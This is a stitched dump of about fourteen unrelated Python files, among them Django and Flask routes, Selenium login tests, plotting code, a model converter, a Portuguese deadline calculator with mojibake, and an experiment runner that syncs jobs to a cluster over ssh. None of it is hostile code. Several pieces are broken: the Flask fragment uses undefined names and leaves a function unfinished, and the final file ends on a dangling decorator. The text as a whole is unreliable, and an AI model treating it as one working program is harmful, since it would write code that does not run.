# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# or in the 'license' file accompanying this file. This file is distributed on an 'AS IS' BASIS, WITHOUT WARRANTIES #
# OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions #
# and limitations under the License. #
# #####################################################################################################################
import logging
import os
DEFAULT_LEVEL = "WARNING"
def get_level():
"""
Get the logging level from the LOG_LEVEL environment variable if it is valid. Otherwise set to WARNING
:return: The logging level to use
"""
valid_levels = ["DEBUG", "INFO", "WARNING", "ERROR", "CRITICAL"]
requested_level = os.environ.get("LOG_LEVEL", DEFAULT_LEVEL)
if requested_level and requested_level in valid_levels:
return requested_level
return DEFAULT_LEVEL
def get_logger(name):
"""
Get a configured logger. Compatible with both the AWS Lambda runtime (root logger) and local execution
:param name: The name of the logger (most often __name__ of the calling module)
:return: The logger to use
"""
logger = None
# first case: running as a lambda function or in pytest with conftest
# second case: running a single test or locally under test
if len(logging.getLogger().handlers) > 0:
logger = logging.getLogger()
logger.setLevel(get_level())
# overrides
logging.getLogger("boto3").setLevel(logging.WARNING)
logging.getLogger("botocore").setLevel(logging.WARNING)
logging.getLogger("urllib3").setLevel(logging.WARNING)
else:
logging.basicConfig(level=get_level()) # NOSONAR (python:S4792)
logger = logging.getLogger(name)
return logger
|
from django.urls import path
from django.utils.translation import gettext_lazy as _
from envergo.users.views import Register, RegisterSuccess, TokenLogin
urlpatterns = [
path(_("register/"), Register.as_view(), name="register"),
path(_("register-success/"), RegisterSuccess.as_view(), name="register_success"),
path(_("login/<uidb64>/<token>/"), TokenLogin.as_view(), name="token_login"),
]
|
def makeAnagram(a, b):
non_common = []
c_list= list(a)
b_list = list(b)
my_d = {}
for char in c_list:
my_d[char] = c_list.count(char)
for char in b_list:
if char not in my_d.keys() or b_list.count(char) != c_list.count(char):
non_common.append(char)
return len(non_common)
|
import numpy as np
import pandas as pd
import statsmodels.api as sm
from linearRegressionModel import *
from handleYears import *
from utility import *
training_data = pd.read_csv("../data/TrainingSet.csv", index_col=0)
submission_labels = pd.read_csv("../data/SubmissionRows.csv", index_col=0)
prediction_rows = training_data.loc[submission_labels.index]
prediction_rows = prediction_rows[generate_year_list(1972, 2007)] # Gets rid of the nonsense columns
# Apply model and make some predictions
predictions = prediction_rows.apply(linearReg_5points, axis=1)
write_submission_file(predictions, "Attempt2.csv")
|
from flask import render_template
from application import app
from application.models import User,Post
@app.route('/edit_profile', methods=['GET', 'POST'])
@login_required
def edit_profile():
form = EditProfileForm(current_user.username)
@app.route('/')
@app.route('/index')
def index():
users = User.query.all()
return render_template('index.html', title='Home', Users=users)
|
# -*- coding: utf-8 -*-
"""
Written by Daniel M. Aukes and CONTRIBUTORS
Email: danaukes<at>asu.edu.
Please see LICENSE for full license.
"""
from distutils.core import setup
import popupcad
packages = []
packages.append('dev_tools')
packages.append('api_examples')
packages.append('popupcad')
packages.append('popupcad.algorithms')
packages.append('popupcad.constraints')
packages.append('popupcad.filetypes')
packages.append('popupcad.geometry')
packages.append('popupcad.graphics2d')
packages.append('popupcad.graphics3d')
packages.append('popupcad.guis')
packages.append('popupcad.manufacturing')
packages.append('popupcad.materials')
packages.append('popupcad.widgets')
packages.append('popupcad_deprecated')
packages.append('popupcad_manufacturing_plugins')
packages.append('popupcad_manufacturing_plugins.manufacturing')
packages.append('popupcad_microrobotics')
packages.append('popupcad_tests')
packages.append('qt')
#packages.append('popupcad_manufacturing_plugins.manufacturing')
#packages.append('pypoly2tri')
package_data = {}
package_data['popupcad'] = ['supportfiles/*','supportfiles/icons/*','supportfiles/test_files/*']
setup(name=popupcad.program_name,
version=popupcad.version,
classifiers=popupcad.classifiers,
description=popupcad.description,
author=popupcad.author,
author_email=popupcad.author_email,
url=popupcad.url,
packages=packages,
package_data=package_data
)
|
import matplotlib
matplotlib.use('Agg')
from matplotlib import pyplot as plt
from matplotlib.ticker import ScalarFormatter
import pandas as pd
import os
def generate_graphics(cov_file, output_dir):
df = pd.read_table(cov_file)
fold_vs_len_file = _generate_fold_vs_length(df, output_dir, "png")
fold_vs_gc_file = _generate_fold_vs_gc(df, output_dir, "png")
gc_hist_file = _generate_gc_histogram(df, output_dir, "png")
return {
"avg_fold_vs_len": fold_vs_len_file,
"gc_vs_avg_fold": fold_vs_gc_file,
"gc_hist": gc_hist_file
}
def _generate_fold_vs_length(df, output_dir, suffix):
"""
df = dataframe, expected to have Avg_fold and Length columns
Makes a file called "avg_fold_vs_len.{suffix}" and returns the full path to it.
"""
fig, ax = plt.subplots(figsize=(6,6))
plt.yticks(rotation=90, va='center')
plt.plot(df.Length, df.Avg_fold, '+')
ax.set_yscale('log')
ax.yaxis.set_major_formatter(ScalarFormatter())
ax.set(xlabel="Contigs Length (bp)", ylabel="Average coverage fold (x)", title="Contigs average fold coverage vs. Contigs length")
outfile = os.path.join(output_dir, "avg_fold_vs_len.{}".format(suffix))
fig.savefig(outfile, dpi=100)
return outfile
def _generate_fold_vs_gc(df, output_dir, suffix):
fig, ax = plt.subplots(figsize=(6,6))
plt.yticks(rotation=90, va='center')
plt.plot(df.Avg_fold, df.Ref_GC, '+')
ax.set_xscale('log')
ax.xaxis.set_major_formatter(matplotlib.ticker.ScalarFormatter())
ax.set(xlabel="Average coverage fold (x)", ylabel="GC (%)", title="Contigs average fold coverage vs. GC")
outfile = os.path.join(output_dir, "gc_vs_avg_fold.{}".format(suffix))
fig.savefig(outfile, dpi=100)
return outfile
def _generate_gc_histogram(df, output_dir, suffix):
fig, ax = plt.subplots(figsize=(6,6))
plt.yticks(rotation=90, va='center')
plt.hist(df[df['Length'].gt(0)].Ref_GC*100, [v/10.0 for v in range(0, 1020, 15)], lw=1, fill=False, fc=(0, 0, 0))
ax.set(ylabel="# of contigs", xlabel="GC (%)", title="GC Histogram for contigs")
outfile = os.path.join(output_dir, "gc_hist.{}".format(suffix))
fig.savefig(outfile, dpi=100)
return outfile
|
import pytest
from selenium import webdriver
from time import sleep
from selenium.webdriver.support.select import Select
import sqlite3
from static.classes.User import User, encryptPassword, decryptPassword
# Global variable
# Prepare the user and password for test
username_test = "test111"
password_test = "Aa123456!!"
institution_test = "SCE_Test"
faculty_test = "Chemistry_Test"
instID = 0
facID = 0
email = "aaa@aaa.com"
@pytest.fixture
def db_prepare_manage_users():
global instID, facID
# Prepare the institution
db_name = "database.db"
# connect to db to prepare it before testing
con = sqlite3.connect(db_name)
cursor=con.cursor()
# Check if institution exists
sqlQueryCheckExist = "SELECT * FROM Institutions WHERE InstitutionName = (?)"
sqlRes = con.execute(sqlQueryCheckExist, (institution_test,))
record = sqlRes.fetchone()
# If institution does not exists create it
if record == None:
sqtInsertInst = "INSERT INTO Institutions (InstitutionName) VALUES (?)"
cursor.execute(sqtInsertInst, (institution_test,))
instID = cursor.lastrowid
else:
instID = record[0]
# Check if faculty exists
sqlQueryCheckExist = "SELECT * FROM Faculties WHERE FacultyName = (?)"
sqlRes = con.execute(sqlQueryCheckExist, (faculty_test,))
record = sqlRes.fetchone()
# If faculty does not exists create it
if record == None:
sqlInsertFac = "INSERT INTO Faculties (FacultyName) VALUES (?)"
cursor.execute(sqlInsertFac, (faculty_test,))
facID = cursor.lastrowid
else:
facID = record[0]
# Check if institution and faculty exists in FacIn table
sqlQueryCheckExist = "SELECT * FROM FacIn WHERE InstitutionID = (?) AND FacultyID = (?)"
sqlRes = con.execute(sqlQueryCheckExist, (instID, facID))
record = sqlRes.fetchone()
# If institution and faculty does not exists create it
if record == None:
sqtInsertInstFac = "INSERT INTO FacIn VALUES (?, ?)"
con.execute(sqtInsertInstFac, (instID, facID))
# Check if user exists in Users table
sqlQueryCheckExist = "SELECT * FROM Users WHERE UserName = (?)"
sqlRes = con.execute(sqlQueryCheckExist, (username_test,))
record = sqlRes.fetchone()
# If user does not exists create it
if record == None:
sqtInsertUser = "INSERT INTO Users VALUES (?,?, ?, ?, ?, ?, ?, 1, 0, ?)"
con.execute(sqtInsertUser, (username_test, "test1", "test1", encryptPassword(password_test), instID, facID, 2, email))
# Commit the changes in users table
con.commit()
#----------------------------------------------------------------
yield db_name
# Check if user exists
sqlQueryCheckExist = "SELECT * FROM Users WHERE UserName = (?)"
sqlRes = con.execute(sqlQueryCheckExist, (username_test,))
record = sqlRes.fetchone()
# If user exists delete the user from DB
if record != None:
sqlDelete = "DELETE FROM Users WHERE UserName = (?)"
sqlRes = con.execute(sqlDelete, (username_test,))
# Check if institution and faculty exists in FacIn table
sqlQueryCheckExist = "SELECT * FROM FacIn WHERE InstitutionID = (?) AND FacultyID = (?)"
sqlRes = con.execute(sqlQueryCheckExist, (instID, facID))
record = sqlRes.fetchone()
# If faculty in institution exists delete it
if record != None:
sqtDelInstFac = "DELETE FROM FacIn WHERE InstitutionID = (?) AND FacultyID = (?)"
con.execute(sqtDelInstFac, (instID, facID))
# Check if faculty exists
sqlQueryCheckExist = "SELECT * FROM Faculties WHERE FacultyName = (?)"
sqlRes = con.execute(sqlQueryCheckExist, (faculty_test,))
record = sqlRes.fetchone()
# If faculty exists delete it
if record != None:
sqlDelFac = "DELETE FROM Faculties WHERE FacultyID = (?)"
con.execute(sqlDelFac, (facID,))
# Check if institution exists
sqlQueryCheckExist = "SELECT * FROM Institutions WHERE InstitutionName = (?)"
sqlRes = con.execute(sqlQueryCheckExist, (institution_test,))
record = sqlRes.fetchone()
# If institution exists create it
if record != None:
sqtDelInst = "DELETE FROM Institutions WHERE InstitutionID = (?)"
con.execute(sqtDelInst, (instID,))
# Commit the changes in users table
con.commit()
# CLose connection to DB
con.close()
class TestIntegrationManageUsers:
def test_manage_users_page(self, application: str, ff_browser: webdriver.Firefox, db_prepare_manage_users):
# Run logout to clean session
ff_browser.get(application + "/logout")
# Open the login page
ff_browser.get(application + "/login")
# Get username and password elements on page
username = ff_browser.find_element_by_name("username")
password = ff_browser.find_element_by_name("password")
# Get submit button element
btnSubmit = ff_browser.find_element_by_xpath("/html/body/div[2]/form/input")
# Inject username and password of test user
username.send_keys(username_test)
password.send_keys(password_test)
# Click on submit button
btnSubmit.click()
# Open the control panel page
ff_browser.get(application + "/controlpanel")
# Get manage users button
btnManageUsers = ff_browser.find_element_by_name("usersManage")
# Click the manage users button
btnManageUsers.click()
# Get manage institution title
manageUsersTitle = ff_browser.find_element_by_name("titleManageUsers")
assert (manageUsersTitle.text == "Manage Users:")
def test_ban_user(self, application: str, ff_browser: webdriver.Firefox, db_prepare_manage_users):
# Run logout to clean session
ff_browser.get(application + "/logout")
# Open the login page
ff_browser.get(application + "/login")
# Get username and password elements on page
username = ff_browser.find_element_by_name("username")
password = ff_browser.find_element_by_name("password")
# Get submit button element
btnSubmit = ff_browser.find_element_by_xpath("/html/body/div[2]/form/input")
# Inject username and password of test user
username.send_keys(username_test)
password.send_keys(password_test)
# Click on submit button
btnSubmit.click()
# Open the manage users page
ff_browser.get(application + "/manage_users")
# Get ban test user button
btnBanTestUser = ff_browser.find_element_by_id(username_test + "_banBtn")
# Click the manage users button
btnBanTestUser.click()
# Run logout to clean session
ff_browser.get(application + "/logout")
# Open the login page
ff_browser.get(application + "/login")
# Get username and password elements on page
username = ff_browser.find_element_by_name("username")
password = ff_browser.find_element_by_name("password")
# Get submit button element
btnSubmit = ff_browser.find_element_by_xpath("/html/body/div[2]/form/input")
# Inject username and password of test user
username.send_keys(username_test)
password.send_keys(password_test)
# Click on submit button
btnSubmit.click()
# Get the banned message element
bannedMsg = ff_browser.find_element_by_xpath("/html/body/div[2]/b")
assert bannedMsg.text == ("Your user is banned!")
def test_unban_user(self, application: str, ff_browser: webdriver.Firefox, db_prepare_manage_users):
# Run logout to clean session
ff_browser.get(application + "/logout")
# Open the login page
ff_browser.get(application + "/login")
# Get username and password elements on page
username = ff_browser.find_element_by_name("username")
password = ff_browser.find_element_by_name("password")
# Get submit button element
btnSubmit = ff_browser.find_element_by_xpath("/html/body/div[2]/form/input")
# Inject username and password of test user
username.send_keys(username_test)
password.send_keys(password_test)
# Click on submit button
btnSubmit.click()
# Open the manage users page
ff_browser.get(application + "/manage_users")
# Get ban test user button
btnBanTestUser = ff_browser.find_element_by_id(username_test + "_banBtn")
# Click the ban user button
btnBanTestUser.click()
# Get unban test user button
btnUnbanTestUser = ff_browser.find_element_by_id(username_test + "_unbanBtn")
# Click the unban user button
btnUnbanTestUser.click()
# Run logout to clean session
ff_browser.get(application + "/logout")
# Open the login page
ff_browser.get(application + "/login")
# Get username and password elements on page
username = ff_browser.find_element_by_name("username")
password = ff_browser.find_element_by_name("password")
# Get submit button element
btnSubmit = ff_browser.find_element_by_xpath("/html/body/div[2]/form/input")
# Inject username and password of test user
username.send_keys(username_test)
password.send_keys(password_test)
# Click on submit button
btnSubmit.click()
# Get the welocme message element
welcomeMsg = ff_browser.find_element_by_name("welcome_message")
assert welcomeMsg.text == ("Welcome " + username_test + "!")
def test_add_admin(self, application: str, ff_browser: webdriver.Firefox, db_prepare_manage_users):
# Run logout to clean session
ff_browser.get(application + "/logout")
# Open the login page
ff_browser.get(application + "/login")
# Get username and password elements on page
username = ff_browser.find_element_by_name("username")
password = ff_browser.find_element_by_name("password")
# Get submit button element
btnSubmit = ff_browser.find_element_by_xpath("/html/body/div[2]/form/input")
# Inject username and password of test user
username.send_keys(username_test)
password.send_keys(password_test)
# Click on submit button
btnSubmit.click()
# Open the manage users page
ff_browser.get(application + "/manage_users")
# Get revoke admin test user button
btnRevokeAdmin = ff_browser.find_element_by_id(username_test + "_revokeBtn")
# Click the revoke admin
btnRevokeAdmin.click()
# Get grant admin test user button
btnGrantAdmin = ff_browser.find_element_by_id(username_test + "_grantBtn")
# Click the grant admin
btnGrantAdmin.click()
# Run logout to clean session
ff_browser.get(application + "/logout")
# Open the login page
ff_browser.get(application + "/login")
# Get username and password elements on page
username = ff_browser.find_element_by_name("username")
password = ff_browser.find_element_by_name("password")
# Get submit button element
btnSubmit = ff_browser.find_element_by_xpath("/html/body/div[2]/form/input")
# Inject username and password of test user
username.send_keys(username_test)
password.send_keys(password_test)
# Click on submit button
btnSubmit.click()
# Get control panel button
controlPanelBtn = ff_browser.find_element_by_name("control_panel_link")
assert controlPanelBtn.text == ("Control Panel")
|
from django.db import models
# Create your models here.
class OAuthUser(models.Model):
pass
|
from demo_constants.demo_racetrack_data import DISCOUNT, REWARD
from gridworld_constants import *
# All possible actions
ACTIONS = [(-1, -1), (-1, 0), (0, -1), (-1, 1),
(0, 0), (1, -1), (0, 1), (1, 0), (1, 1)]
# Constant step penalty
REWARD = -1
DISCOUNT = 1
# Schema used for creating a gridlworld
GRIDWORLD_SCHEMA = [
[(OPEN, 10)],
[(OPEN, 10)],
[(OPEN, 10)],
[(START, 1), (OPEN, 6), (GOAL, 1), (OPEN, 2)],
[(OPEN, 10)],
[(OPEN, 10)],
[(OPEN, 10)],
]
# Maps the displacement due to wind by column
COL_TO_WIND = {
0: 0,
1: 0,
2: 0,
3: 1,
4: 1,
5: 1,
6: 2,
7: 2,
8: 1,
9: 0
}
|
# Copyright 2021 UW-IT, University of Washington
# SPDX-License-Identifier: Apache-2.0
from unittest import TestCase
from uw_canvas.utilities import fdao_canvas_override
from uw_canvas.admins import Admins
import mock
@fdao_canvas_override
class CanvasTestAdmins(TestCase):
def test_admins(self):
canvas = Admins()
admins = canvas.get_admins_by_sis_id('uwcourse:seattle:nursing:nurs')
self.assertEquals(len(admins), 11, "Failed to follow Link header")
admin = admins[10]
self.assertEquals(admin.role, 'AccountAdmin', "Has proper role")
self.assertEquals(admin.user.user_id, 1111, "Has proper id")
@mock.patch.object(Admins, '_post_resource')
def test_create_admin(self, mock_post):
canvas = Admins()
canvas.create_admin_by_sis_id(
'uwcourse:seattle:nursing:nurs', 1111, 'AccountAdmin')
mock_post.assert_called_with((
'/api/v1/accounts/sis_account_id%3Auwcourse%3Aseattle'
'%3Anursing%3Anurs/admins'), {
'role': 'AccountAdmin',
'send_confirmation': False,
'user_id': '1111'
})
@mock.patch.object(Admins, '_delete_resource')
def test_delete_admin(self, mock_delete):
canvas = Admins()
canvas.delete_admin_by_sis_id(
'uwcourse:seattle:nursing:nurs', 1111, 'AccountAdmin')
mock_delete.assert_called_with((
'/api/v1/accounts/sis_account_id%3Auwcourse%3Aseattle%3Anursing'
'%3Anurs/admins/1111?role=AccountAdmin'))
|
import argparse
import sys
import torch
from torch.autograd import Variable
import pytorch_to_caffe
from target_model import mobilenet_v1
def load_pretrained_model(model, checkpoint):
checkpoint = torch.load(checkpoint, map_location=lambda storage, loc: storage)['state_dict']
model_dict = model.state_dict()
for k in checkpoint.keys():
kc = k.replace('module.', '')
if kc in model_dict.keys():
model_dict[kc] = checkpoint[k]
if kc in ['fc_param.bias', 'fc_param.weight']:
model_dict[kc.replace('_param', '')] = checkpoint[k]
model.load_state_dict(model_dict)
return model
def main(args):
name = args.name
if args.factor == 1:
model = mobilenet_v1.mobilenet_1()
elif args.factor == 0.5:
model = mobilenet_v1.mobilenet_05()
else:
sys.exit(-1)
model = load_pretrained_model(model, args.checkpoint)
model.eval()
input = Variable(torch.rand(1, 3, 120, 120))
pytorch_to_caffe.trans_net(model, input, name)
pytorch_to_caffe.save_prototxt('{}.prototxt'.format(name))
pytorch_to_caffe.save_caffemodel('{}.caffemodel'.format(name))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Transfer mobilenet from pytorch to caffe')
parser.add_argument('-f', '--factor', type=float, default=1)
parser.add_argument('-c', '--checkpoint', type=str, default='target_model/mb1_120x120.pth')
parser.add_argument('-n', '--name', type=str, default='caffe_model/mobilenet1')
args = parser.parse_args()
main(args)
|
# Cรกlculo de datas para contagem de prazo
# 1 Importando bibliotecas necessรกrias
from datetime import date, datetime
import calendar
# 2 Incluindo Cabeรงalho e linhas divisรณrias
print('CALCULADORA DE PRAZOS')
def linha():
print('=' * 45, '\n')
linha()
# 3 Execuรงรฃo do Script com Loop while True
while True:
# 4 Solicitando os dados do usuรกrio com tratamento de exceรงรฃo
while True:
try:
string = input('\nData da Infraรงรฃo ex.:(01011999): ').strip()
except ValueError:
print('Informe uma data vรกlida!')
else:
if len(string) > 8 or len(string) < 8:
print('Informe uma data vรกlida! Ex.: 01011999')
else:
break
while True:
try:
prazo = int(input('Informe o prazo(em dias): '))
except ValueError:
print('Dados Incorretos! Digite novamente!')
else:
break
# 5 Convertendo a string para o tipo data - saรญda 0000-00-00
data = datetime.strptime(string, '%d%m%Y')
# 6 Obtendo o mรชs e o ano relativo a data informada
mes = data.month
ano = data.year
# 7 Obtendo data final apรณs prazo informado
data_final = data.fromordinal(data.toordinal()+(prazo))
# 8 Obtendo o dia รบtil da semana com base na data final
dias = ('Segunda-Feira', 'Terรงa-Feira', 'Quarta-Feira', 'Quinta-Feira',
'Sexta-Feira', 'Sรกbado', 'Domingo')
# 9 Caso a data final caia em um sรกbado ou domingo, deverรก retornar o prรณximo dia รบtil
if dias[data_final.weekday()] == 'Sรกbado':
# o dia รบtil serรก segunda-feira
dia_util = data.fromordinal(data_final.toordinal()+2)
# obtem o dia da semana conforme o dia รบtil
dia_da_semana = dias[dia_util.weekday()]
elif dias[data_final.weekday()] == 'Domingo':
dia_util = data.fromordinal(data_final.toordinal()+1)
dia_da_semana = dias[dia_util.weekday()]
else:
dia_util = data_final
dia_da_semana = dias[data_final.weekday()]
# 10 Obtendo o mรชs baseadao na data final, quando esta cai no mรชs subsequente
prox_mes = data_final.month
# 11 Organizando o calendรกrios com as datas obtidas
# calendario do mes referente a primeira data informada
c1 = calendar.TextCalendar(calendar.SUNDAY)
cal1 = c1.formatmonth(ano, mes)
# calendario do mes referente a data final quando esta cai para o mรชs seguinte
c2 = calendar.TextCalendar(calendar.SUNDAY)
cal2 = c2.formatmonth(ano, prox_mes)
linha()
print(cal1)
print()
# o segundo calendรกrio serรก apresentado somente se a data cair para o prรณximo mรชs
if prox_mes != mes:
print(cal2)
print()
linha()
# 12 Formatando a saรญda para o modelo de data desejado 00/00/0000 (data final)
data_format = dia_util.strftime('%d/%m/%Y')
# apresentando o resultado
print(f'Prazo Final: {data_format}, {dia_da_semana}')
linha()
# 13 Pra finalizar uma variรกvel que receberรก um valor que definirรก a continuidade
# ou nรฃo do loop.
resposta = input('\nDeseja Continuar ? [S/N]').strip().upper()
if resposta in 'Nn':
break
|
from objects import experiments, outputtable, computationalresource
import json
import itertools
import copy
import os
import lxml.etree as etree
import sqlite3 as lite
import sys
import subprocess
import datetime
import time
modelsAndAlgorithmNames_global = []
baseParamsDict_global = {}
computationalResource_global = None
outputtable_global = None
outputtable_relerror_global = None
databaseName_global = '../db/facpro-results.db'
databaseTables = {'BaseExpr', 'RelError'}
def remove_old_solution_files():
dir = "../output/"
directory = os.listdir(dir)
for item in directory:
if item.endswith(".mst") or item.endswith(".sol"):
os.remove(os.path.join(dir, item))
def setUp(mode = 'debug', resetParams = False):
if resetParams:
remove_old_solution_files()
createOutputTables()
createDefaultComputationalResource(mode)
createBaseParamsDict()
def setUpDatabase(dropExisting = False):
con = None
try:
con = lite.connect(databaseName_global)
c = con.cursor()
if dropExisting:
for tableName in databaseTables:
c.execute('drop table if exists ' + tableName)
# Create table
c.execute(getCreateTableString_BaseExpr())
c.execute(getCreateTableString_RelError())
con.commit()
except lite.Error, e:
if con:
con.rollback()
print "Error %s:" % e.args[0]
sys.exit(1)
finally:
if con:
con.close()
def getCreateTableString_BaseExpr():
myDict = json.loads(open('../db/databaseTableColumns.json').read())
typesDict = myDict['types']
string = 'CREATE TABLE ' + 'BaseExpr' + '''('''
for column in myDict['metaColumns']:
string += column + ' ' + typesDict[column] + ', '
for dbColCategory in myDict['columnsInAllTables']:
for dbColName in myDict['columnsInAllTables'][dbColCategory]:
string += dbColName + ' ' + typesDict[dbColName] + ', '
for column in myDict['baseTableColumns']:
string += column + ' ' + typesDict[column] + ', '
string = string[:-2]
string += ''');'''
return string
def getCreateTableString_RelError():
myDict = json.loads(open('../db/databaseTableColumns.json').read())
typesDict = myDict['types']
string = 'CREATE TABLE ' + 'RelError' + '''('''
for column in myDict['metaColumns']:
string += column + ' ' + typesDict[column] + ', '
for dbColCategory in myDict['columnsInAllTables']:
for dbColName in myDict['columnsInAllTables'][dbColCategory]:
string += dbColName + ' ' + typesDict[dbColName] + ', '
for column in myDict['relErrorTableColumns']:
string += column + ' ' + typesDict[column] + ', '
string = string[:-2]
string += ''');'''
return string
def createOutputTables():
global outputtable_global, outputtable_relerror_global
outputtable_global = outputtable.OutputTable(databaseName = databaseName_global, tableName = 'mainTable')
outputtable_relerror_global = outputtable.OutputTable(databaseName = databaseName_global, tableName='relerrorTable')
def createDefaultComputationalResource(mode = 'debug'):
global computationalResource_global
if mode == 'debug':
computationalResource_global = computationalresource.createComputationalResource('shadow-debug')
else:
computationalResource_global = computationalresource.createComputationalResource('shadow-unsponsored')
def createBaseParamsDict():
global baseParamsDict_global
baseParamsDict_global = json.loads(open('baseExperimentParameters.json').read())
def flatten_two_level_nested_dict(dict):
newDict = {}
for key in dict:
for subkey in dict[key]:
newDict[subkey] = dict[key][subkey]
return newDict
def cardProductOfDictionaries(paramsDict):
for key in paramsDict:
if not isinstance(paramsDict[key], list):
paramsDict[key] = [paramsDict[key]]
return list(dict(itertools.izip(paramsDict, x)) for x in itertools.product(*paramsDict.itervalues()))
def createParamsDictsForExprmnts(baseParamsDict, rangesOfParametersToVary, group_def = None):
''' returns a list of dictonaries, one for each experiment'''
if group_def is not None:
baseParamsDict = flatten_two_level_nested_dict(baseParamsDict)
newParamsDict = copy.deepcopy(baseParamsDict)
for paramName in rangesOfParametersToVary.keys():
newParamsDict[paramName] = rangesOfParametersToVary[paramName]
list_of_flattened_dicts = cardProductOfDictionaries(newParamsDict)
list_of_unflattened_dicts = []
for flattened_dict in list_of_flattened_dicts:
unflattened_dict = {}
for key in group_def:
unflattened_dict[key] = {}
for subkey in group_def[key]:
unflattened_dict[key][subkey] = flattened_dict[subkey]
list_of_unflattened_dicts.append(unflattened_dict)
return list_of_unflattened_dicts
def getFilenameForExprParamsDict(rangesOfParametersToVary, paramsDict):
paramsToVary = rangesOfParametersToVary.keys()
stringToAdd = ''
for paramName in paramsToVary:
stringToAdd += '_' + paramName + '-' + paramsDict[paramName]
return '../exprFiles/ExprParams_base' + stringToAdd + '.json'
def runExperimentsForExperimentBatch(ranges_of_params_to_vary, experimentName,
modelsAndAlgs = modelsAndAlgorithmNames_global, baseParamsDict = None,
runTheExperiments = False, localMode = False):
group_def = json.loads(open('../db/databaseTableColumns.json').read())['columnsInAllTables']
if baseParamsDict is None:
params_dicts_for_exprs = createParamsDictsForExprmnts(baseParamsDict_global,
ranges_of_params_to_vary, group_def)
else:
params_dicts_for_exprs = createParamsDictsForExprmnts(baseParamsDict, ranges_of_params_to_vary, group_def)
print "paramsDictsForExperiments", params_dicts_for_exprs
exprBatch = experiments.OptimizationExperimentBatch(computationalResource_global,
'../exprBatchScripts/run_experiments_for_' + experimentName + '.sh')
for paramsDict in params_dicts_for_exprs:
for infModelName in modelsAndAlgs:
scriptCall = 'python ' + '../src/models/run_facpro.py'
exprBatch.addOptimizationExperiment(experiments.OptimizationExperiment(scriptCall,
computationalResource_global, outputtable_global, experimentName,
parametersDictionary = paramsDict, paramsThatChanged = ranges_of_params_to_vary.keys()))
exprBatch.writeBatchScript()
if not localMode:
print "syncing files"
os.system('rsync -av --exclude ~/PycharmProjects/wnopt_cavs3/exprBatchScripts/rsync-exclude-list.txt '
'~/PycharmProjects/wnopt_cavs3 hmedal@shadow-login:/work/hmedal/code/')
os.system('ssh hmedal@shadow-login chmod a+x /work/hmedal/code/wnopt_cavs3/exprBatchScripts/*.sh')
result = subprocess.check_output('ssh hmedal@shadow-login "cd /work/hmedal/code/wnopt_cavs3/exprBatchScripts; '
'./run_experiments_for_Test.sh"', shell = True) # note to self: output appears in exprBatchScripts
print "result ", result
with open('../log/jobs_scheduled.log', 'a') as f:
ts = time.time()
f.write(datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S') + '\n')
f.write(result + '\n') # python will convert \n to os.linesep
f.close() # you can omit in most cases as the destructor will call it
def run_experiments_for_RunTime_Table(runTheExperiments = False):
rangesOfParametersToVary = {'datasetName': ['grid-7x7',
'berkeley', 'grid-8x8', 'grid-9x9'], 'numChannels' : [1,2], 'jamBudget' : [1,3]}
runExperimentsForExperimentBatch(rangesOfParametersToVary, 'RunTime',
modelsAndAlgs=modelsAndAlgorithmNames_global,
runTheExperiments = runTheExperiments)
if runTheExperiments:
os.system('ssh hmedal@shadow-login "cd /work/hmedal/code/wnopt_cavs/exprBatchScripts; '
'./run_experiments_for_RunTime.sh"')
def run_experiments_for_HeatMap_Figure(runTheExperiments = False):
rangesOfParametersToVary = {'dataset': ['grid-7x7', 'berkeley'], 'numChannels': [1, 2], 'numJammers': [1, 3]}
paramsDictsForExperiments = createParamsDictsForExprmnts(baseParamsDict_global, rangesOfParametersToVary)
exprBatch = experiments.OptimizationExperimentBatch(computationalResource_global,
'../exprBatchScripts/run_experiments_for_HeatMap_Figure.sh')
for paramsDict in paramsDictsForExperiments:
for infModelName in ['none', 'semi-additive', 'capture', 'protocol', 'interferenceRangeA',
'interferenceRangeB']:
paramsDict['interferenceApproximateModel'] = infModelName
paramsDict['interferenceTrueModel'] = 'additive'
scriptCall = 'python ' + '../src/models/relerror.py'
exprBatch.addOptimizationExperiment(experiments.OptimizationExperiment(scriptCall,
computationalResource_global, outputtable_global, 'HeatMap', parametersDictionary=paramsDict))
def run_experiments_for_NumNodes_Table():
rangesOfParametersToVary = {'dataset': ['grid-7x7', 'berkeley', 'grid-8x8', 'grid-9x9']}
runExperimentsForExperimentBatch(rangesOfParametersToVary, 'NumNodes')
def run_experiments_for_NumChannels_Table():
rangesOfParametersToVary = {'dataset': ['grid-7x7', 'berkeley'], 'numChannels' : [1,2,3]}
runExperimentsForExperimentBatch(rangesOfParametersToVary, 'NumChannels')
def run_experiments_for_NumJammerLocations_Table_2D():
rangesOfParametersToVary = {'dataset': ['grid-7x7', 'berkeley'], 'numJammerLocations': [9, 16, 25]}
runExperimentsForExperimentBatch(rangesOfParametersToVary, 'NumJammerLocations_2D')
def run_experiments_for_NumJammerLocations_Table_3D():
rangesOfParametersToVary = {'dataset': ['grid_5x5x5', 'berkeley_3d'], 'numJammerLocations': [27, 64, 125]}
runExperimentsForExperimentBatch(rangesOfParametersToVary, 'NumJammerLocations_3D')
def run_experiments_for_NumJammerLocations_Table():
run_experiments_for_NumJammerLocations_Table_2D()
run_experiments_for_NumJammerLocations_Table_3D()
def run_experiments_for_NumJammers_Table():
rangesOfParametersToVary = {'dataset': ['grid-7x7', 'berkeley'], 'numJammers': [1,2,3,4,5]}
runExperimentsForExperimentBatch(rangesOfParametersToVary, 'NumJammers')
if __name__ == "__main__":
setUpDB = False
setUp()
if setUpDB:
setUpDatabase()
run_experiments_for_RunTime_Table()
run_experiments_for_HeatMap_Figure()
run_experiments_for_NumNodes_Table()
run_experiments_for_NumChannels_Table()
run_experiments_for_NumJammerLocations_Table()
run_experiments_for_NumJammers_Table()
|
# -*- coding: utf-8 -*-
import pandas as pd
from functools import wraps
from ..common import _getJson, _raiseIfNotStr, _reindex, _toDatetime
def news(symbol, count=10, token='', version='', filter=''):
'''News about company
https://iexcloud.io/docs/api/#news
Continuous
Args:
symbol (str): Ticker to request
count (int): limit number of results
token (str): Access token
version (str): API version
filter (str): filters: https://iexcloud.io/docs/api/#filter-results
Returns:
dict or DataFrame: result
dict: result
'''
_raiseIfNotStr(symbol)
return _getJson('stock/' + symbol + '/news/last/' + str(count), token, version, filter)
def _newsToDF(n):
'''internal'''
df = pd.DataFrame(n)
_toDatetime(df, cols=[], tcols=['datetime'])
_reindex(df, 'datetime')
return df
@wraps(news)
